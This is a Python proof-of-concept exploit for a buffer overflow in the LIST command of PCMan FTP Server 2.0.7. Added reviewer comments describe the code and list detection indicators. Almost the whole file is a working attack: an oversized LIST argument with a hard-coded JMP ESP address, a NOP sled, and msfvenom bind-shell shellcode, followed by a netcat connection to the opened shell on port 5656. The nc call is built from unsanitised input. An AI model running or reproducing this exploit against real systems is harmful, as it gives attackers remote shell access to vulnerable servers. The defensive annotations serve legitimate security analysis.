#!/usr/bin/env python
#-*- coding: utf-8 -*-

# Exploit Title: PCMan FTP Server 2.0.7 - 'LIST' Command Buffer Overflow
# Date: 07/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Tested on: Windows 7 Ultimate 32Bit

# Reviewer notes (defensive reading of this proof of concept):
#   * Language: Python 2 only (print statements, `except Exception, e`).
#   * Traffic this script produces, usable as detection indicators:
#       - FTP login as `anonymous` with the fixed password `CT-Zer0`;
#       - one `LIST` command whose argument is over 2000 bytes long: a run
#         of 'A' characters followed by non-printable bytes;
#       - afterwards, a TCP connection to port 5656 on the FTP host (the
#         port named in the msfvenom comment below).
#   * NOTE(review): the payload is placed directly after the overwritten
#     value and reached through a fixed address inside SHELL32.dll, so the
#     technique presumably depends on an executable stack and a predictable
#     module address. Confirm DEP/ASLR status of the service when assessing
#     exposure.

import socket
import sys
import os
import time


def exploit(target, port):
    """Send an oversized FTP LIST argument to target:port, then run `nc`.

    target -- host name or address, passed to socket.connect() and later
              concatenated into the `nc` command line.
    port   -- integer TCP port of the FTP service.

    Returns None. Calls sys.exit(0) if the initial connection fails.
    """
    # 4-byte value written right after the 2006 filler bytes; per the
    # author's note it is the address 0x76B49CC3 in little-endian order.
    # NOTE(review): the address is hard-coded for the author's test system
    # (see "Tested on" in the header).
    eip = "\xC3\x9C\xB4\x76" #SHELL32.dll 76B49CC3 JMP ESP

    # Payload bytes, generated by the author with the command below. The -b
    # option lists byte values excluded from the output (NUL, LF, CR, 0xFF).
    # msfvenom -p windows/shell_bind_tcp LPORT=5656 -b '\x00\x0a\x0d\xff' -f c
    shellcode = ("\xdb\xcf\xd9\x74\x24\xf4\xba\x9f\xef\x1b\x27\x5e\x29\xc9\xb1"
    "\x53\x31\x56\x17\x03\x56\x17\x83\x59\xeb\xf9\xd2\x99\x1c\x7f"
    "\x1c\x61\xdd\xe0\x94\x84\xec\x20\xc2\xcd\x5f\x91\x80\x83\x53"
    "\x5a\xc4\x37\xe7\x2e\xc1\x38\x40\x84\x37\x77\x51\xb5\x04\x16"
    "\xd1\xc4\x58\xf8\xe8\x06\xad\xf9\x2d\x7a\x5c\xab\xe6\xf0\xf3"
    "\x5b\x82\x4d\xc8\xd0\xd8\x40\x48\x05\xa8\x63\x79\x98\xa2\x3d"
    "\x59\x1b\x66\x36\xd0\x03\x6b\x73\xaa\xb8\x5f\x0f\x2d\x68\xae"
    "\xf0\x82\x55\x1e\x03\xda\x92\x99\xfc\xa9\xea\xd9\x81\xa9\x29"
    "\xa3\x5d\x3f\xa9\x03\x15\xe7\x15\xb5\xfa\x7e\xde\xb9\xb7\xf5"
    "\xb8\xdd\x46\xd9\xb3\xda\xc3\xdc\x13\x6b\x97\xfa\xb7\x37\x43"
    "\x62\xee\x9d\x22\x9b\xf0\x7d\x9a\x39\x7b\x93\xcf\x33\x26\xfc"
    "\x3c\x7e\xd8\xfc\x2a\x09\xab\xce\xf5\xa1\x23\x63\x7d\x6c\xb4"
    "\x84\x54\xc8\x2a\x7b\x57\x29\x63\xb8\x03\x79\x1b\x69\x2c\x12"
    "\xdb\x96\xf9\x8f\xd3\x31\x52\xb2\x1e\x81\x02\x72\xb0\x6a\x49"
    "\x7d\xef\x8b\x72\x57\x98\x24\x8f\x58\xb0\xac\x06\xbe\xd6\xdc"
    "\x4e\x68\x4e\x1f\xb5\xa1\xe9\x60\x9f\x99\x9d\x29\xc9\x1e\xa2"
    "\xa9\xdf\x08\x34\x22\x0c\x8d\x25\x35\x19\xa5\x32\xa2\xd7\x24"
    "\x71\x52\xe7\x6c\xe1\xf7\x7a\xeb\xf1\x7e\x67\xa4\xa6\xd7\x59"
    "\xbd\x22\xca\xc0\x17\x50\x17\x94\x50\xd0\xcc\x65\x5e\xd9\x81"
    "\xd2\x44\xc9\x5f\xda\xc0\xbd\x0f\x8d\x9e\x6b\xf6\x67\x51\xc5"
    "\xa0\xd4\x3b\x81\x35\x17\xfc\xd7\x39\x72\x8a\x37\x8b\x2b\xcb"
    "\x48\x24\xbc\xdb\x31\x58\x5c\x23\xe8\xd8\x6c\x6e\xb0\x49\xe5"
    "\x37\x21\xc8\x68\xc8\x9c\x0f\x95\x4b\x14\xf0\x62\x53\x5d\xf5"
    "\x2f\xd3\x8e\x87\x20\xb6\xb0\x34\x40\x93")

    # LIST argument layout: 2006 filler bytes, the 4-byte `eip` value,
    # 21 bytes of 0x90 (x86 NOP), then the payload.
    # NOTE(review): the filler length presumably places `eip` over a saved
    # return address in the server's LIST handler; the server code is not
    # shown here.
    buffer = 'A'*2006 + eip + "\x90"*21 + shellcode

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,port))
        # Reads up to 1024 bytes and discards them (presumably the greeting).
        s.recv(1024)
        print "[+] Connect to %s on port %d" % (target,port)
    except Exception, e:
        print "[-] Could not create socket", e.message
        # NOTE(review): exit status is 0 even though the connection failed.
        sys.exit(0)

    try:
        # Anonymous login with a fixed password string; replies are read
        # but never checked.
        s.send('USER anonymous\r\n')
        s.recv(1024)
        s.send('PASS CT-Zer0\r\n')
        s.recv(1024)
        # The oversized command itself.
        s.send('LIST ' + buffer + '\r\n')
        print "[+] Exploit Sent Successfully"
        s.close()
        # NOTE(review): printed unconditionally; nothing above verifies that
        # port 5656 is actually listening.
        print '[+] You got bind shell on port 5656\n'
        time.sleep(2)
        # NOTE(review): `target` comes straight from sys.argv and is
        # concatenated into a shell command line; an argument list passed to
        # subprocess would avoid shell interpretation of that value.
        os.system('nc ' + target + ' 5656')
    except:
        # NOTE(review): bare except; any error in the block above (not only
        # a connection problem) ends up reported with this message.
        print "[-] Could not connect to target"


def banner():
    """Print the script's ASCII banner."""
    # The local name `banner` shadows the function name inside this body.
    banner = "\n\n"
    banner +=" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa \n"
    banner +=" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n"
    banner +=" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"
    banner +=" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"
    banner +=" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa \n"
    banner +=" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa \n"
    banner +=" \n"
    print banner


# Entry point: expects exactly two arguments, the target host and the port.
if len(sys.argv) == 3:
    banner()
    target = sys.argv[1]
    port = int(sys.argv[2])
    exploit(target, port)
else:
    banner()
    # NOTE(review): the usage text names no arguments, although the branch
    # above reads sys.argv[1] (target) and sys.argv[2] (port).
    print "[*] Usage: python %s  \n" % sys.argv[0]
    sys.exit(0)